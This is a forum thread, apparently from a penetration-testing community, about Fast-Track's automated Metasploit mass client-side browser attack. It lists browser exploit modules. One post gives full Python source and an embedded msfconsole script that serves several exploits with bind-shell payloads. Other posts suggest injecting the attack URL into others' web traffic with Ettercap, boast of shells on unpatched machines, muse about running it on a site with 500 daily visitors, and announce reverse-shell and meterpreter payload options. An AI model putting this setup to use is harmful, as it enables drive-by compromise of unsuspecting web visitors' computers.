Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: Mass Client Side

  1. #1
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Cool Mass Client Side

    Metasploit Mass Client-side Attack
    This I just a quick post about the script and how it works.
    It runs a bunch of Metasploit attacks at once and starts a local websever and puts all the attacks in an iframe.

    *Update fast-track.py
    Goto the program menu > backtrack > penetration > fasttrack
    You can run the script directly from /pentest/fast-track/
    *Choose’2. External Hacking
    *Choose ‘7. Metasploit Mass Client-Side Attack’


    Here is a list of the exploits it runs ( the rc file is called metasploitloadfiles )

    windows/browser/ie_createobject
    osx/browser/software_update
    windows/browser/apple_quicktime_rtsp
    windows/browser/winamp_playlist_unc
    multi/browser/qtjava_pointer
    windows/browser/ibmlotusdomino_dwa_uploadmodule
    windows/browser/ani_loadimage_chunksize

    What you can do is combine this with a simple Ettercap filter to inject your url at the end of say the body tag. Here is a sample post of a etterfilter.
    http://forums.remote-exploit.org/showthread.php?t=12885

    My next tutorial will be on replacing all HTTP GET of EXE’s with say a Metasploit payload ;P

  2. #2
    Junior Member aggtrfrad's Avatar
    Join Date
    Apr 2008
    Posts
    74

    Default

    yeah its pretty cool, i got 3 shells on my unpatched XP SP2
    imagin this running on a small site with 500 visitors per day
    it's still so easy to get a shell, many people do never update...
    -Google is watching you

    -June 1, 2001, Microsoft CEO Steve Ballmer: "Linux is a cancer that attaches itself in an intellectual property sense to everything it touches."

  3. #3
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    17

    Default

    @operat0r:

    is there a way to change mass client side payload from shell to meterpreter?

  4. #4
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Yes you can... you have to change a few things around in the source... here is how i did it...

    open the metaclient.py and replace it with this code... you can find the file in this directory /pentest/fast-track/bin/ftsrc
    Code:
    import pexpect,sys,os
    try:
       import psyco
       psyco.full()
    except ImportError:
       pass
    # Start mass client attack
    try:
        import re
        metapath=file("%s/bin/setup/metasploitconfig.file" % (definepath)).readlines()
        for line in metapath:
            metapath=line.rstrip()
    except Exception:
        print "Metasploit path not defined, you should run setup.py,\nusing the default for now..."
        metapath="/pentest/exploits/framework3/"
    try:
        #define IP Addr to echo into index.html
        ipaddr=sys.argv[3]
        definepath=os.getcwd()
        print "Setting up Metasploit MSFConsole with various exploits..."
        #prepfile=file("metasploitloadfile","w")
        #prepfile.write("use exploit/windows/browser/ie_createobject\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8001\nset URIPATH /\nexploit\nuse exploit/osx/browser/software_update\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8002\nset URIPATH /\nexploit\nuse exploit/windows/browser/apple_quicktime_rtsp\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8003\nset URIPATH /\nexploit\nuse exploit/windows/browser/winamp_playlist_unc\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8007\nset URIPATH /\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8005\nset URIPATH /\nset TARGET 0\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8006\nset URIPATH /\nset TARGET 1\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8008\nset URIPATH /\nset TARGET 2\nexploit\nuse exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8009\nset URIPATH /\nexploit\nuse exploit/windows/browser/ani_loadimage_chunksize\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8000\nset URIPATH /\nexploit\n")
        #prepfile.close()
        print "If an exploit succeeds, type sessions -l to list shells and sessions -i <id>\nto interact...\n\n"
        print "Have someone connect to you on port 80...\n"
        print "Launching MSFConsole and Exploits...\n"
        print "Once you see the Metasploit Console launch all the exploits have someone\nconnect to you.."
        definepath=os.getcwd()
        launchsploit=os.popen2("""xterm -geometry 100x300x450x500 -T "Fast-Track Metasploit Mass Client Attack" -e "%smsfconsole -r %s/metasploitloadfile" 2> /dev/null""" % (metapath,definepath)) 
        launchhttpserver=os.popen2("""xterm -geometry 100x50 -T "Fast-Track Metasploit Custom HTTP Server" -e "python %s/bin/ftsrc/metahttpserver.py %s" 2> /dev/null""" % (definepath,ipaddr))   
        pause=raw_input("Press enter to end the Mass Client Attack...")        
    except KeyboardInterrupt:
           print "\n\nExiting Metasploit Mass Client Attack...\n\n"
           delfile=os.popen3("del metasploitloadfile")
    except Exception:
           print "\n\nExiting Metasploit Mass Client Attack...\n\n"
           delfile=os.popen3("del metasploitloadfile")
    now you need to open the metasploitloadfile located here /pentest/fast-track.... make your changes and save the file

    If you know how to use the metasploit console then the rest is up to you

  5. #5
    Junior Member SBerry's Avatar
    Join Date
    Dec 2007
    Posts
    94

    Default

    I have used the mass client side attack to pwn Internet explorer many of times. When I try to exploit Firefox it says that in order to exploit the browser you must set the SRVPORT to 80 and URI to /.
    I tried changing the SRVPORT for the exploit in metaclient.py.

    Is this the correct procedure? and has anyone got this working??

  6. #6

    Default

    is there any benefit to running this over the browser autopwn script itself?

  7. #7
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default changes

    I'll make some changes later to specify if you want a meterpreter shell, shell bind etc. in the next release, good find, would be cool to add the option to menu/command line/webgui

  8. #8
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default hahaha

    Alright TWO hours later its done :P

    I'll update Fast-Track tomorrow with some bug fixes and a new addition to the metasploit mass client attack....

    You can now specify payloads you want, I added four so far, if you guys have any other requests let me know, but right now, you can now specify in all modes (interactive, command line, and web gui)

    1. Meterpreter Reverse TCP
    2. Reverse TCP Shell
    3. Meterpreter VNC Reverse Inject
    4. Generic Bind Shell

    I tested all of them, it was pretty sweeeeet to see a reverse vnc GUI through mass client attack!!!

    I'll update tomorrow.

    Thanks for the ideas.

    ReL

  9. #9

  10. #10
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Fast-Track updated.
    Already played around with it. Great work relik - like always...........
    Thanks.
    Don't eat yellow snow :rolleyes:

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •